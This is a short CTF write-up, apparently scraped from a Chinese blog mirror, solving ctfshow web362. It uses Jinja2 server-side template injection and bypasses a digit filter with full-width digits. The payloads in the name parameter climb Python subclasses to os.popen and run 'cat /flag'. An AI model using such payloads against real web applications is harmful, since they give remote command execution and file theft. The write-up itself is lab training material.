当前位置:网站首页>ctfshow-web362(SSTI)
ctfshow-web362(SSTI)
2022-04-23 18:29:00 【m0_62094846】
?name={
{"".__class__.__bases__[0].__subclasses__()}} 一直到这一步都是正常的
从12开始就没用了
数字出现了问题,看wp用全角数字代替正常数字绕过
?name={
{"".__class__.__bases__[0].__subclasses__()[132]}}
然后应该可以用正常方法做了
?name={
{"".__class__.__bases__[0].__subclasses__()[132].__init__.__globals__['popen']('cat /flag').read()}}
版权声明
本文为[m0_62094846]所创,转载请带上原文链接,感谢
https://blog.csdn.net/m0_62094846/article/details/124361669
边栏推荐
- Rust: how to match a string?
- Robocode tutorial 3 - Robo machine analysis
- Install the yapiupload plug-in in idea and upload the API interface to the Yapi document
- C medium? This form of
- Linux installs MySQL in RPM (super simple)
- Hard core parsing promise object (do you know these seven common APIs and seven key questions?)
- Crawl lottery data
- Rust: how to implement a thread pool?
- 多功能工具箱微信小程序源码
- ESP32 LVGL8. 1 - label (style 14)
猜你喜欢
Nodejs安装
How to restore MySQL database after win10 system is reinstalled (mysql-8.0.26-winx64. Zip)
Nodejs installation
Halo open source project learning (VII): caching mechanism
Robocode tutorial 3 - Robo machine analysis
MATLAB小技巧(6)七种滤波方法比较
Matlab tips (6) comparison of seven filtering methods
Hard core parsing promise object (do you know these seven common APIs and seven key questions?)
硬核解析Promise对象(这七个必会的常用API和七个关键问题你都了解吗?)
Dock installation redis
随机推荐
函数递归以及趣味问题的解决
Function recursion and solving interesting problems
硬核解析Promise對象(這七個必會的常用API和七個關鍵問題你都了解嗎?)
Rust: how to match a string?
C medium? This form of
【ACM】509. Fibonacci number (DP Trilogy)
MATLAB从入门到精通(二)
机器学习实战 -朴素贝叶斯
Kettle paoding jieniu Chapter 17 text file output
Const keyword, variable and function are decorated with const
Deep learning classic network analysis and target detection (I): r-cnn
QT notes on qmap container freeing memory
QT add external font ttf
【ACM】509. 斐波那契数(dp五部曲)
Box pointer of rust
Test post and login function
The difference between deep copy and shallow copy
多功能工具箱微信小程序源码
In shell programming, the shell file with relative path is referenced
ESP32 LVGL8. 1 - label (style 14)